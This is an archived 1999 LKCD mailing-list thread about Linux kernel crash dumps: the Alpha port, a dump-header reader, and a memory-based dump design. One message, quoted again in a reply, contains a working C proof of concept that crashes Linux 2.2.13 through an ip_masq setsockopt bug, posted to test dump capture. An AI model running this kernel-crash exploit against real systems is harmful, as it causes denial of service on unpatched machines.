From owner-lkcd@oss.sgi.com Wed Dec 1 10:13:38 1999 Received: by oss.sgi.com id ; Wed, 1 Dec 1999 10:13:29 -0800 Received: from mailext03.compaq.com ([207.18.199.41]:51876 "HELO mailext03.compaq.com") by oss.sgi.com with SMTP id ; Wed, 1 Dec 1999 10:13:06 -0800 Received: by mailext03.compaq.com (Postfix, from userid 12345) id EC8B3152157; Wed, 1 Dec 1999 12:19:58 -0600 (CST) Received: from mailint02.im.hou.compaq.com (mailint02.compaq.com [207.18.199.35]) by mailext03.compaq.com (Postfix) with ESMTP id E0529148506 for ; Wed, 1 Dec 1999 12:19:58 -0600 (CST) Received: by mailint02.im.hou.compaq.com (Postfix, from userid 12345) id 626EFBC4C2; Wed, 1 Dec 1999 12:19:52 -0600 (CST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by mailint02.im.hou.compaq.com (Postfix) with SMTP id E7939B2A49 for ; Wed, 1 Dec 1999 12:19:51 -0600 (CST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA23635; Wed, 1 Dec 1999 11:19:57 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA24805; Wed, 1 Dec 1999 11:19:57 -0700 Content-Length: 899 Message-Id: X-Mailer: XFMail 1.4.2 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 Date: Wed, 01 Dec 1999 11:20:48 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: lkcd@oss.sgi.com Subject: Volunteer to work with Alpha port of lkcd Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing I would like to work on and/or help with the port of the lkcd patch to the Alpha platform. I have access to several different models with an Alpha processor. Currently I have two 1200s and a ES40 running RedHat 6.0 Alpha, with various versions of the 2.2 kernel. All have their swap on SCSI drives and are available for lkcd testing. Advice on how to proceed would be helpful. 
Looks like some functions need to be made safe for 64 bits first, then new Alpha-specific functions need to be stubbed out in new files in the Alpha arch tree. I'm a little worried about the snippet of i386 ASM code to save the CPU registers. Hopefully I can use a PALcode system call to do that (and similar things) on the Alpha. Anyone on this list familiar with the Alpha platform, from the point of view of the Linux kernel ? (I know, but I thought I'd ask!) -- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Wed Dec 1 10:40:19 1999 Received: by oss.sgi.com id ; Wed, 1 Dec 1999 10:40:09 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:59439 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Wed, 1 Dec 1999 10:39:47 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id KAA08447 for ; Wed, 1 Dec 1999 10:48:10 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id KAA82641; Wed, 1 Dec 1999 10:45:21 -0800 (PST) Date: Wed, 1 Dec 1999 10:45:21 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Brian Hall cc: lkcd@oss.sgi.com Subject: Re: Volunteer to work with Alpha port of lkcd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Wed, 1 Dec 1999, Brian Hall wrote: ] I would like to work on and/or help with the port of the lkcd patch ] to the Alpha platform. I have access to several different models with ] an Alpha processor. Currently I have two 1200s and a ES40 running ] RedHat 6.0 Alpha, with various versions of the 2.2 kernel. All have ] their swap on SCSI drives and are available for lkcd testing. Awesome, we're willing to help where we can. 
] Advice on how to proceed would be helpful. Looks like some functions
] need to be made safe for 64 bits first, then new Alpha-specific
] functions need to be stubbed out in new files in the Alpha arch tree.
] I'm a little worried about the snippet of i386 ASM code to save the
] CPU registers. Hopefully I can use a PALcode system call to do that
] (and similar things) on the Alpha.

The first thing to do is to take the kernel code in
arch/i386/kernel/vmdump.c and copy it to arch/alpha/kernel, modify
the makefile, and then modify the calls for saving the pt_regs.

The code for saving the registers is mostly correct, except for:

        if (regs) {
                memcpy((void *)&(dump_header.dh_regs), (const void *)regs,
                        sizeof(struct pt_regs));
>               if (!user_mode(regs)) {
>                       dump_header.dh_regs.esp = (unsigned long) (regs + 1);
>               }
        }

Those lines aren't necessarily needed -- they are I386 specific. We
have to adjust the esp based on the processor mode.

Also, the code for:

        /* save the dump specific esp/eip */
        __asm__ __volatile__("
                pushl %%eax\n
                movl %%esp, %%eax\n
                movl %%eax, %0\n
                popl %%eax\n"
                : "=g" (dump_header.dh_esp)
        );
        __asm__ __volatile__("pushl %eax\n");
        __dump_save_panic_regs();
        __asm__ __volatile__("popl %eax\n");

All of this is set up just to save the stack pointer and program
counter for this box, as the pt_regs on I386 boxes don't necessarily
point to the right location. We want to be able to walk back from
the exception where that is possible.

In looking at the Alpha stuff, I think you can start by saving the
PC and RA values (not sure which $XX they represent), and also put
a hook into die_if_kernel() in traps.c. I'd also suggest modifying
a system call to test the panic() routine out. Once you get that
going, see if the memory is actually being written out to the swap
device as expected.
If you want, you can change '/sbin/vmdump save' to run a special
application to print out the dump header:

/* Header names were stripped from the archived copy of this message.
 * <stdio.h> and <time.h> are what the code below requires; the two
 * bare #include lines after CONFIG_VMDUMP stood for kernel headers
 * from the lkcd patch, one of which defines dump_header_t. */
#include <stdio.h>
#include <time.h>
#define CONFIG_VMDUMP
#include
#include

dump_header_t dump_header;

int
main(int argc, char **argv)
{
        FILE *fp;

        if (argc != 2) {
                fprintf(stderr, "Usage: %s \n", argv[0]);
                return (1);
        }

        if ((fp = fopen(argv[1], "r")) == (FILE *)NULL) {
                perror("fopen");
                return (1);
        }

        /* the dump header follows the swap header, one page in */
        fseek(fp, 4096, SEEK_SET);

        /* fread() returns the number of items read, never a negative value */
        if (fread((char *)&dump_header, sizeof(dump_header_t), 1, fp) != 1) {
                perror("fread");
                fclose(fp);
                return (1);
        }
        fclose(fp);

        printf("Dump Header (version %d):\n", dump_header.dh_version);
        printf("Magic number: 0x%llx\n", dump_header.dh_magic_number);
        printf("PAGE_SIZE = %d\n", dump_header.dh_page_size);
        printf("Dump header size: %d\n", dump_header.dh_header_size);
        printf("Physical memory:\n");
        printf("\tStart: 0x%x\n", dump_header.dh_memory_start);
        printf("\t  End: 0x%x\n", dump_header.dh_memory_end);
        printf("\t Size: %d\n", dump_header.dh_memory_size);
        printf("Number of pages in dump: %d\n", dump_header.dh_num_pages);
        printf("Time of dump: %s\n", ctime(&(dump_header.dh_time.tv_sec)));
        return (0);
}

If you run this against /dev/vmdump, it should print out the dump
header (it is always after the swap header, at PAGE_SIZE, or 4096
bytes, on our system). Let me know if this gets you started and
if we can offer any other advice.

Thanks!

--Matt

] Anyone on this list familiar with the Alpha platform, from the point
] of view of the Linux kernel ? (I know, but I thought I'd ask!)
]
] --
] Brian Hall
] Linux Consultant

From owner-lkcd@oss.sgi.com Mon Dec 6 11:05:12 1999
Received: by oss.sgi.com id ; Mon, 6 Dec 1999 11:04:53 -0800
Received: from mailext04.compaq.com ([207.18.199.42]:21944 "HELO mailext04.compaq.com") by oss.sgi.com with SMTP id ; Mon, 6 Dec 1999 11:04:30 -0800
Received: by mailext04.compaq.com (Postfix, from userid 12345) id 6BE19104CFC; Mon, 6 Dec 1999 13:11:47 -0600 (CST)
Received: from mailint02.im.hou.compaq.com (mailint02.compaq.com [207.18.199.35]) by mailext04.compaq.com (Postfix) with ESMTP id 680F9FB101 for ; Mon, 6 Dec 1999 13:11:47 -0600 (CST)
Received: by mailint02.im.hou.compaq.com (Postfix, from userid 12345) id A7488BC4D4; Mon, 6 Dec 1999 13:11:40 -0600 (CST)
Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by mailint02.im.hou.compaq.com (Postfix) with SMTP id 304DEB2A44 for ; Mon, 6 Dec 1999 13:11:40 -0600 (CST)
Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA08705; Mon, 6 Dec 1999 12:11:46 -0700
Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA06225; Mon, 6 Dec 1999 12:11:40 -0700
Content-Length: 1802
Message-Id:
X-Mailer: XFMail 1.4.2 on Linux
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
Mime-Version: 1.0
Date: Tue, 07 Dec 1999 16:36:34 -0700 (MST)
Reply-To: Brian Hall
From: Brian Hall
To: lkcd@oss.sgi.com
Subject: lkcd doesn't make a dump for this case
Sender: owner-lkcd@oss.sgi.com
Precedence: bulk
Return-Path:
X-Orcpt: rfc822;lkcd-outgoing

Today there was a post on the kernel list of a snippet of C code to crash the
2.2.13 kernel via an ip_masq exploit. After modifying this to compile (header
names were slightly different for some reason), I ran it to test lkcd. The
system crashed so fast I could barely see what went on. It looked like several
oopses scrolled by, then the dreaded "killing interrupt handler" message.
No crash dump was generated. I have successfully created crash dumps on this
system via the tests described in the FAQ.

My question is, will or can this be fixed in a future version of lkcd? I don't
mean specifically relative to this crash case, but in the general "killing
interrupt handler" case. Mission Critical Linux claimed they were going to fix
this same type of problem in a future version of their crash patch. As of now
they are about three weeks overdue on that.

The code:

/* crash 2.2.13 kernel exploiting a bug in ip_masq_user.c (c)djsf */

#include
#include
#include
#include
#include
/*
#include
#include
*/
#include
#include

#include
#include
#include

int main()
{
  int sock;
  struct ip_masq_ctl mctl;

  memset (&mctl, 0, sizeof (mctl));
  mctl.m_target = IP_MASQ_TARGET_USER; mctl.m_cmd = IP_MASQ_CMD_DEL;
  mctl.u.user.protocol = IPPROTO_UDP;
  if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
    perror ("socket"); exit (1);
  }
  if (setsockopt (sock, IPPROTO_IP, IP_FW_MASQ_CTL, &mctl, sizeof (mctl)))
    perror ("kab00m failed :) ");
  exit (0);
}

--
Brian Hall
Linux Consultant

From owner-lkcd@oss.sgi.com Mon Dec 6 11:20:15 1999
Received: by oss.sgi.com id ; Mon, 6 Dec 1999 11:20:05 -0800
Received: from sgi.SGI.COM ([192.48.153.1]:70 "EHLO sgi.com") by oss.sgi.com with ESMTP id ; Mon, 6 Dec 1999 11:19:37 -0800
Received: from awesome.engr.sgi.com ([150.166.49.119]) by sgi.com (980327.SGI.8.8.8-aspam/980304.SGI-aspam: SGI does not authorize the use of its proprietary systems or networks for unsolicited or bulk email from the Internet.)
via ESMTP id LAA02894 for ; Mon, 6 Dec 1999 11:26:51 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id LAA94292; Mon, 6 Dec 1999 11:25:33 -0800 (PST) Date: Mon, 6 Dec 1999 11:25:32 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Brian Hall cc: lkcd@oss.sgi.com Subject: Re: lkcd doesn't make a dump for this case In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Hi, Brian. I'll run a few tests on this today. Just an FYI, the reason why ours and MCL's code doesn't work correctly is because you're panicing in an interrupt handler, which means you're calling down() twice, which inevitably breaks the crash dump process. I have a set of code which avoids this problem, but I'm not sure how to integrate it into the kernel, since it is SCSI specific (again). The real point is, if you try to use I/O interrupts to disk when you're already locking out interrupts, you're not going to be able to dump data to disk. It's a problem we are working on. I'll try out your code today and try to have feedback for you if not today, then tomorrow. Thanks! --Matt On Tue, 7 Dec 1999, Brian Hall wrote: |>Today there was a post on the kernel list of a snippet of C code to crash to |>2.2.13 kernel via an ip_masq exploit. After modifying this to compile (header |>names were slightly different for some reason), I ran it to test lkcd. The |>system crashed so fast I could barely see what went on. Looked like several |>oopses scrolled by, then the dreaded "killing interrupt handler" message. No |>crash dump was generated. I have successfully created crash dumps on this |>system via the tests described in the FAQ. |> |>My question is, will or can this be fixed in a future version of lkcd? 
I don't |>mean specifically relative to this crash case, but in the general "killing |>interrupt handler" case. Mission Critical Linux claimed they were going to fix |>this same type of problem in a future version of their crash patch. As of now |>they are about three weeks overdue on that. |> |>The code: |> |>/* crash 2.2.13 kernel exploiting a bug in ip_masq_user.c (c)djsf */ |> |>#include |>#include |>#include |>#include |>#include |>/* |>#include |>#include |>*/ |>#include |>#include |> |>#include |>#include |>#include |> |>int main() |>{ |> int sock; |> struct ip_masq_ctl mctl; |> |> memset (&mctl, 0, sizeof (mctl)); |> mctl.m_target = IP_MASQ_TARGET_USER; mctl.m_cmd = IP_MASQ_CMD_DEL; |> mctl.u.user.protocol = IPPROTO_UDP; |> if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { |> perror ("socket"); exit (1); |> } |> if (setsockopt (sock, IPPROTO_IP, IP_FW_MASQ_CTL, &mctl, sizeof (mctl))) |> perror ("kab00m failed :) "); |> exit (0); |>} |> |>-- |>Brian Hall |>Linux Consultant From owner-lkcd@oss.sgi.com Mon Dec 6 11:41:25 1999 Received: by oss.sgi.com id ; Mon, 6 Dec 1999 11:41:15 -0800 Received: from mail.missioncriticallinux.com ([63.211.176.148]:44039 "EHLO mail.mclinux.com") by oss.sgi.com with ESMTP id ; Mon, 6 Dec 1999 11:41:06 -0800 Received: from mclinux.com (IDENT:winchell@winchell.mclinux.com [192.168.1.103]) by mail.mclinux.com (8.9.3/8.9.3) with ESMTP id OAA03699; Mon, 6 Dec 1999 14:47:22 -0500 Message-ID: <384C2200.D98A808F@mclinux.com> Date: Mon, 06 Dec 1999 14:52:16 -0600 From: David Winchell Organization: Mission Critical Linux X-Mailer: Mozilla 4.7 [en] (X11; U; Linux 2.2.5-15smp i686) X-Accept-Language: en MIME-Version: 1.0 To: Brian Hall CC: lkcd@oss.sgi.com, winchell@mclinux.com Subject: Re: lkcd doesn't make a dump for this case References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Brian Hall wrote: > 
Mission Critical Linux claimed they were going to fix > this same type of problem in a future version of their crash patch. As of now > they are about three weeks overdue on that. This is true, we are overdue. Sorry about the delay. Getting Intel BIOS's to not clear memory on reboot has been a challenge. We've had success on some manufacturer's BIOS and are working on the others. In parallel with the Intel work, we've started on the alpha. This should be easy for the core saving part as we know that it doesn't clear memory with proper setting of console variables. However, we have quite a bit of work to do on the crash analysis tool for alpha. Once we can fully support an architecture, the code will be made available. Meanwhile, we will run the sample program you have on an Intel box that has the "good" BIOS and see what we can come up with. Regards, Dave From owner-lkcd@oss.sgi.com Tue Dec 7 15:53:35 1999 Received: by oss.sgi.com id ; Tue, 7 Dec 1999 15:53:25 -0800 Received: from lowell.missioncriticallinux.com ([63.211.176.149]:3124 "EHLO moyer.mclinux.com") by oss.sgi.com with ESMTP id ; Tue, 7 Dec 1999 15:53:05 -0800 Received: (from moyer@localhost) by moyer.mclinux.com (8.9.3/8.9.3) id SAA13883; Tue, 7 Dec 1999 18:59:59 -0500 X-Authentication-Warning: moyer.mclinux.com: moyer set sender to moyer@mclinux.com using -f From: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14413.40831.220835.54194@moyer.mclinux.com> Date: Tue, 7 Dec 1999 18:59:59 -0500 (EST) To: Brian Hall Cc: lkcd@oss.sgi.com Subject: lkcd doesn't make a dump for this case In-Reply-To: References: X-Mailer: VM 6.75 under Emacs 20.3.1 Reply-To: moyer@missioncriticallinux.com Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing ==> Regarding lkcd doesn't make a dump for this case; Brian Hall adds: [snip] brianw.hall> case. 
Mission Critical Linux claimed they were going to fix
brianw.hall> this same type of problem in a future version of their crash
brianw.hall> patch. As of now they are about three weeks overdue on that.

Well, we were able to generate a dump for your test case.
Unfortunately, the stack trace was none too interesting. The "killing
interrupt handler" part of your oops means that either the
local_bh_count is non-zero, the local_irq_count is non-zero, or both.
With our dump, we were at least able to determine which of these was
true:

crash> p local_bh_count
local_bh_count[1] = { 00000001 };
crash> p local_irq_count
local_irq_count[1] = { 00000000 };

As you know from the posting to the kernel list, the function
start_bh_atomic was called, without the corresponding end_bh_atomic.
This increments (in the UP kernel) the local_bh_count, which matches
the value of 1 shown above, and causes our problem. The next time we
enter schedule, this count is non-zero, so the check for in_interrupt()
returns 1, and we get our scheduling in interrupt problem.

I hope this is useful to you in some way. As Dave mentioned, once we
come up with a method for preserving memory on reboots that works with
all BIOSes, we will make the code available.
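The check described above can be modelled in user space. What follows
is only a sketch under stated assumptions, not kernel code: it assumes a
single CPU, re-implements the two counters and the in_interrupt() test
as plain C, and uses a hypothetical schedule_check() helper to stand in
for the test made on entry to schedule(). It is consistent with the
crash output above, where local_bh_count is 1 and local_irq_count is 0.

```c
#include <assert.h>
#include <stdio.h>

/* Single-CPU stand-ins for the kernel's per-CPU counters (assumption). */
unsigned int local_irq_count[1];
unsigned int local_bh_count[1];

/* Model of start_bh_atomic() on a UP kernel: bump the bh counter. */
void start_bh_atomic(void)
{
    local_bh_count[0]++;
}

/* Model of end_bh_atomic(): undo the matching start_bh_atomic(). */
void end_bh_atomic(void)
{
    assert(local_bh_count[0] > 0);
    local_bh_count[0]--;
}

/* Returns 1 when either counter is non-zero, 0 otherwise. */
int in_interrupt(void)
{
    return (local_irq_count[0] + local_bh_count[0]) != 0;
}

/*
 * Hypothetical helper modelling the test on entry to schedule():
 * returns 0 if scheduling may proceed, -1 if the kernel would
 * report scheduling in interrupt.
 */
int schedule_check(void)
{
    if (in_interrupt()) {
        fprintf(stderr, "Scheduling in interrupt\n");
        return -1;
    }
    return 0;
}
```

Calling start_bh_atomic() without a matching end_bh_atomic() leaves the
model in the same state as the dump: schedule_check() fails until the
counter is brought back to zero.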
Regards, Jeff Moyer Mission Critical Linux http://www.missioncriticallinux.com From owner-lkcd@oss.sgi.com Mon Dec 13 00:19:34 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 00:19:25 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:20133 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Mon, 13 Dec 1999 00:19:00 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Mon Dec 13 00:17:39 1999 To: lkcd@oss.sgi.com Date: Mon, 13 Dec 1999 00:17:39 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: info for LKCD X-Sender-Ip: 192.35.232.115 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 277 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Can any one guide me to what is the system dump and what is the work being done in that area in Linux. I would also like to know about the various crash facilities that are being provided in Linux. LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Mon Dec 13 00:28:44 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 00:28:35 -0800 Received: from sgi.SGI.COM ([192.48.153.1]:4972 "EHLO sgi.com") by oss.sgi.com with ESMTP id ; Mon, 13 Dec 1999 00:28:16 -0800 Received: from awesome.engr.sgi.com ([150.166.49.119]) by sgi.com (980327.SGI.8.8.8-aspam/980304.SGI-aspam: SGI does not authorize the use of its proprietary systems or networks for unsolicited or bulk email from the Internet.) 
via ESMTP id AAA00171 for ; Mon, 13 Dec 1999 00:27:04 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id AAA35981; Mon, 13 Dec 1999 00:25:48 -0800 (PST) Date: Mon, 13 Dec 1999 00:25:47 -0800 (PST) From: Matt Robinson To: Ashish Arora cc: lkcd@oss.sgi.com Subject: Re: info for LKCD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing There are a few development fronts in the area of system dumps. The LKCD project is one such effort, although there is an additional effort from the folks at Mission Critical Linux, who are on this list and can provide information about their work. Beyond that, there are a few things that provide information about system crashes, but that doesn't really address your need for system dumps. If you've got questions about LKCD, check out: http://oss.sgi.com/projects/lkcd/faq.html We consider it the foundation for system dumps in Linux, for both now and in the future. Your mileage may vary. :) You can also download the code and see our implementation mechanism if you're curious about the code. It's fairly straightforward. I'm in the process of writing a paper for our talk at LinuxExpo on LKCD, and when it's finished and thoroughly reviewed, I'll send it out. For those of you who'd like to attend the talk, Tom and I will be in New York in February at LinuxExpo to discuss LKCD (along with other efforts in the community) and how we can make kernel dumps a supported reality for commercial Linux users. --Matt P.S. To everyone out there, I'll send out a new News bulletin as to where we're at with things here, including what we're working on, what we need from the community, etc. Thanks for all your support. 
On Mon, 13 Dec 1999, Ashish Arora wrote:
|> Can any one guide me to what is the system dump and what is the work
|> being done in that area in Linux. I would also like to know about the
|> various crash facilities that are being provided in Linux.

From owner-lkcd@oss.sgi.com Mon Dec 13 01:58:01 1999
Received: by oss.sgi.com id ; Mon, 13 Dec 1999 01:57:51 -0800
Received: from fes-qout.whowhere.com ([209.1.236.7]:29156 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Mon, 13 Dec 1999 01:57:47 -0800
Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Mon Dec 13 01:55:31 1999
To: "Matt Robinson"
Date: Mon, 13 Dec 1999 01:55:31 -0800
From: "Ashish Arora"
Message-ID:
Mime-Version: 1.0
Cc: lkcd@oss.sgi.com
X-Sent-Mail: on
Reply-To: ashisharora@mailcity.com
X-Expiredinmiddle: true
X-Mailer: MailCity Service
Subject: Re: info for LKCD
X-Sender-Ip: 192.35.232.115
Organization: MailCity (http://www.mailcity.lycos.com:80)
Content-Type: text/plain; charset=us-ascii
Content-Language: en
Content-Length: 2288
Content-Transfer-Encoding: 7bit
Sender: owner-lkcd@oss.sgi.com
Precedence: bulk
Return-Path:
X-Orcpt: rfc822;lkcd-outgoing

I would like to know where I can get the source code for the lkcd project. I would also like to ask the people working at Mission Critical Linux to tell me which aspects of mission-critical computing they are dealing with at present, and what facilities will be provided in their Linux.
Matt, can you tell me more about what is really being done in the area of system dumps, how system crashes are being dealt with, and what the solution for a system crash is?

- Ashish


On Mon, 13 Dec 1999 00:25:47 Matt Robinson wrote:
>There are a few development fronts in the area of system dumps.
>The LKCD project is one such effort, although there is an additional
>effort from the folks at Mission Critical Linux, who are on this list
>and can provide information about their work.
Beyond that, there are >a few things that provide information about system crashes, but that >doesn't really address your need for system dumps. > >If you've got questions about LKCD, check out: > > http://oss.sgi.com/projects/lkcd/faq.html > >We consider it the foundation for system dumps in Linux, for both >now and in the future. Your mileage may vary. :) > >You can also download the code and see our implementation mechanism >if you're curious about the code. It's fairly straightforward. > >I'm in the process of writing a paper for our talk at LinuxExpo on >LKCD, and when it's finished and thoroughly reviewed, I'll send it >out. For those of you who'd like to attend the talk, Tom and I will >be in New York in February at LinuxExpo to discuss LKCD (along with >other efforts in the community) and how we can make kernel dumps a >supported reality for commercial Linux users. > >--Matt > >P.S. To everyone out there, I'll send out a new News bulletin as to > where we're at with things here, including what we're working on, > what we need from the community, etc. Thanks for all your support. > >On Mon, 13 Dec 1999, Ashish Arora wrote: >|> Can any one guide me to what is the system dump and what is the work >|> being done in that area in Linux. I would also like to know about the >|> various crash facilities that are being provided in Linux. > > LYCOShop is now open. On your mark, get set, SHOP!!! 
http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Mon Dec 13 08:05:31 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 08:05:22 -0800 Received: from mail.missioncriticallinux.com ([63.211.176.148]:11529 "EHLO mail.mclinux.com") by oss.sgi.com with ESMTP id ; Mon, 13 Dec 1999 08:05:00 -0800 Received: from mclinux.com (IDENT:winchell@winchell.mclinux.com [192.168.1.103]) by mail.mclinux.com (8.9.3/8.9.3) with ESMTP id LAA12474; Mon, 13 Dec 1999 11:03:29 -0500 Message-ID: <38552814.966448BC@mclinux.com> Date: Mon, 13 Dec 1999 11:08:36 -0600 From: David Winchell Organization: Mission Critical Linux X-Mailer: Mozilla 4.7 [en] (X11; U; Linux 2.2.5-15smp i686) X-Accept-Language: en MIME-Version: 1.0 To: ashisharora@mailcity.com CC: lkcd@oss.sgi.com, winchell@mclinux.com Subject: [Fwd: Memory based kernel crash dump] Content-Type: multipart/mixed; boundary="------------DA32CFCCD346A1644011B3F3" Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing This is a multi-part message in MIME format. --------------DA32CFCCD346A1644011B3F3 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Ashish, You can check out our web site at www.mclinux.com for information. Also, I believe there is a press release coming out today that will give some details. On the crash front we have a version 1 available from the web site. The crash saving is not as slick as SGI's but the crash analysis might be better. I am working on a version 2 which is memory based. This may have been discussed on this list and was discussed on the linux-kernel list. A copy of the mail is attached. 
regards, Dave --------------DA32CFCCD346A1644011B3F3 Content-Type: message/rfc822 Content-Transfer-Encoding: 7bit Content-Disposition: inline Return-Path: Received: from mclinux.com (IDENT:winchell@winchell.mclinux.com [192.168.1.103]) by mail.mclinux.com (8.9.3/8.9.3) with ESMTP id KAA12977; Thu, 11 Nov 1999 10:49:53 -0500 Sender: winchell@missioncriticallinux.com Message-ID: <382AE668.A18EED73@mclinux.com> Date: Thu, 11 Nov 1999 09:53:12 -0600 From: David Winchell Organization: Mission Critical Linux X-Mailer: Mozilla 4.7 [en] (X11; U; Linux 2.2.5-15smp i686) X-Accept-Language: en MIME-Version: 1.0 To: "linux-kernel@vger.rutgers.edu" CC: winchell@mclinux.com Subject: Memory based kernel crash dump Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hello, I have been working on a kernel crash dump that does not rely on the disk subsystems during the crash. Instead, the crash is saved in memory at crash time and then saved to a file on the subsequent boot. The save at crash time is accomplished by selecting pages that are not [free, user anon, user shared, file page cache] and compressing them into pages that are above a certain address, a certain distance from the end of memory, not locked, and are members of [free, user anon, user shared, file page cache]. A reboot is then requested with the option to preserve memory. Early in the boot process, the non-contiguous pages containing the dump are copied to contiguous pages at the end of memory. Later in the boot process, they are written to a file and freed. On a 96M machine the size of the compressed dump was 4M. Scratch memory is saved at boot time for crash dump use. I use about 2M for this, though smaller amounts can be tuned. This ensures that a dump can be taken even with very low free memory conditions. 
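The page selection described above can be sketched as two predicates.
This is a minimal illustration under stated assumptions, not the Mission
Critical Linux code: the enum, the struct and every function name are
hypothetical, pages are identified by index rather than by address, and
"a certain distance from the end of memory" is read here as "outside a
reserved tail region", on the assumption that the tail is where the
contiguous copy is assembled at boot.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical page classes; the first four are the ones named in the text. */
enum page_kind {
    PAGE_FREE,
    PAGE_USER_ANON,
    PAGE_USER_SHARED,
    PAGE_FILE_CACHE,
    PAGE_OTHER              /* everything else, e.g. kernel data */
};

struct page_info {
    enum page_kind kind;
    int locked;             /* non-zero if the page must not be overwritten */
};

/* True for the four classes whose contents are not saved in the dump. */
int is_scratchable(enum page_kind kind)
{
    return kind == PAGE_FREE || kind == PAGE_USER_ANON ||
           kind == PAGE_USER_SHARED || kind == PAGE_FILE_CACHE;
}

/* Source pages: everything that is NOT in one of the four classes. */
int should_dump(const struct page_info *p)
{
    assert(p != NULL);
    return !is_scratchable(p->kind);
}

/*
 * Destination pages: index at or above min_idx, outside the last
 * tail_reserve pages of memory, unlocked, and in one of the four classes.
 */
int can_hold_dump(const struct page_info *pages, size_t npages, size_t idx,
                  size_t min_idx, size_t tail_reserve)
{
    assert(pages != NULL);
    if (idx >= npages || idx < min_idx)
        return 0;
    if (tail_reserve >= npages || idx >= npages - tail_reserve)
        return 0;
    if (pages[idx].locked)
        return 0;
    return is_scratchable(pages[idx].kind);
}
```

A crash-time pass would then walk all pages once, compressing each page
for which should_dump() holds into the next page for which
can_hold_dump() holds. The compression step and the bookkeeping needed
to find the pages again after reboot are left out of the sketch.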
For example, here is a stack trace of a crash in interrupt context, a
case that can be difficult for disk based solutions:

crash> bt
PID: 286    TASK: c0b3a000  CPU: 0   COMMAND: "in.rlogind"
 #0 [c0b3be90] crash_save_current_state at c011aed0
    (c0b3a000,c08e4190,4000001,c0b3bee8,tulip_interrupt+0x2c)
 #1 [c0b3bea4] panic+0xac at c011367c
    (media_cap+0x1446,c08e4190,4000001,9,5a8)
 #2 [c0b3bee8] tulip_interrupt+0x2c at c01bc820
    (9,eth0_dev,c0b3bf44,irq_desc+0x90,9)
 #3 [c0b3bf08] handle_IRQ_event+0x2d at c010a551
    (9,c0b3bf44,c08e4190)
